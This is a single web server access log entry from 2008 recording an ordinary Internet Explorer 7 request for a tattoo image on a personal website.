212.219.59.222 - - [24/Aug/2008:08:21:42 -0500] "GET /tattoo/tatc10.JPG HTTP/1.0" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)"
